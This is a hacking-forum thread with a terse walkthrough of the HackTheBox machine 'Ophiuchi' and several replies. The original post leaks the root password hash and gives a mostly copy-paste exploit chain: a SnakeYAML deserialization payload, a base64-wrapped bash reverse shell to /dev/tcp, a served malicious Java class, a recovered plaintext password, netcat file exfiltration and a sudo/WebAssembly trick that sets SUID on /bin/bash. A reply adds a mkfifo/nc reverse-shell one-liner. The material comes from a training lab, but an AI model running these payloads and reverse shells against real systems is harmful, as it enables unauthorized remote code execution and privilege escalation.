TUTORIAL Hackthebox Writeup Ophiuchi
by randomname83 - February 14, 2021 at 01:05 AM
#1
root hashSpoiler
root:$6$oPgtRE0IgWrXKitG$Z5FyXxEXm5l.skZbIBKm0poPFPUxgZVY5DPii0DFsQgSBiL98ioRBuHDVzOHaZCgH.xyLnpGIksHlfBXC4LQo/:18554:0:99999:7:::

get userSpoiler
exploit: https://github.com/artsploit/yaml-payload


git clone https://github.com/artsploit/yaml-payload


create rev shell command:
cmd="bash -c 'bash -i >& /dev/tcp/10.10.10.10/9001 0>&1'"
jex="bash -c {echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"
echo $jex


paste rev shell command into file src/artsploit/AwesomeScriptEngineFactory.java at line 12
delete line 13

compile and serve:
javac src/artsploit/AwesomeScriptEngineFactory.java
cd src
python3 -m http.server 80


trigger exploit: browse to http://10.10.10.227:8080/ and enter:
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.10.10/"]
  ]]
]


privesc from tomcat to admin:
cd ~
cd conf
cat * | grep pass
su admin
# pass = whythereisalimit

get rootSpoiler
ssh [email protected]
# pass = whythereisalimit

privesc from admin to root:
sudo -l


download main.wasm:
1. start listener on your machine
nc -lvnp 9002 > main.wasm
2. send file
cat /opt/wasm-functions/main.wasm > /dev/tcp/10.10.10.10/9001


analyze file:
1. upload at https://webassembly.github.io/wabt/demo/...index.html
2. edit the 0 to a 1 and copy the code:
(module
  (type $t0 (func (result i32)))
  (func $info (export "info") (type $t0) (result i32)
    (i32.const 1))
  (table $T0 1 1 funcref)
  (memory $memory (export "memory") 16)
  (global $g0 (mut i32) (i32.const 1048576))
  (global $__data_end (export "__data_end") i32 (i32.const 1048576))
  (global $__heap_base (export "__heap_base") i32 (i32.const 1048576)))
3. paste the code at https://webassembly.github.io/wabt/demo/...index.html
4. click on download
5. transfer the downloaded file to target to a writeable directory
6. create deploy.sh and run sudo command:

echo "chmod +s /bin/bash" > deploy.sh
sudo -u root /usr/bin/go run /opt/wasm-functions/index.go
/bin/bash -p
#2
Thank you! Much appreciated!
#3
https://jopraveen.wordpress.com/2021/02/14/ophiuchi/


Here is a writeup of Jopraveen
#4
(February 14, 2021 at 09:36 AM)RFADMIN Wrote: https://jopraveen.wordpress.com/2021/02/14/ophiuchi/


Here is a writeup of Jopraveen
and there: https://fdlucifer.github.io/2021/02/14/Ophiuchi/
#5
[/quote]
and there: https://fdlucifer.github.io/2021/02/14/Ophiuchi/
[/quote]

Nice writeup bro
#6
(February 14, 2021 at 11:06 AM)lucifer113 Wrote: and there: https://fdlucifer.github.io/2021/02/14/Ophiuchi/

sry, i didnt write exactly what you need to put into the java file.
im not sure, if your way works...
if it doesnt work, can you please update it, so it is only the output of the last command?
...
public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("<here output of echo $jex>");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
...
#7
(February 14, 2021 at 11:59 AM)randomname83 Wrote:
(February 14, 2021 at 11:06 AM)lucifer113 Wrote: and there: https://fdlucifer.github.io/2021/02/14/Ophiuchi/

sry, i didnt write exactly what you need to put into the java file.
im not sure, if your way works...
if it doesnt work, can you please update it, so it is only the output of the last command?
...
public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("<here output of echo $jex>");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
...
it works find, you can try it, and there are many other ways to modify the exploit, and thanks for your simplicity writeup...:)
#8
don't need jex, just use
Runtime.getRuntime().exec("sh -c $@|sh . echo `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip 6666 >/tmp/f`");
#9
Thanks you for writeup=))
#10
(February 14, 2021 at 09:36 AM)RFADMIN Wrote: https://jopraveen.wordpress.com/2021/02/14/ophiuchi/


Here is a writeup of Jopraveen
this is shit man the other one is good
#11
(February 15, 2021 at 05:15 PM)nero007 Wrote:
(February 14, 2021 at 09:36 AM)RFADMIN Wrote: https://jopraveen.wordpress.com/2021/02/14/ophiuchi/


Here is a writeup of Jopraveen
this is shit man the other one is good
True :-)
#12
Can someone explain the web assembly part?
I have no fukkin idea, why do i have to change that number from 0 to 1, why should I create deploy.sh script, and how it is called....The write-ups only contains "to this and it will work" but none of the are telling why.... I would be grateful if someone could enlighten me!

Possibly Related Threads…
Thread Author Replies Views Last Post
SELLING DANTE NEW HACKTHEBOX PROLABS FLAGS + WRITEUP ARE NOW AVAILABLES Mrbom 35 7,786 May 13, 2021 at 10:47 PM
Last Post: Mrbom
TUTORIAL Ophiuchi HTB mini writeup + Root hash bugbunny 15 3,269 May 13, 2021 at 04:30 PM
Last Post: lucifer786
FLAG Schooled Hackthebox writeup sakthi2852 5 2,569 May 08, 2021 at 04:13 AM
Last Post: warface

 Users browsing this thread: 1 Guest(s)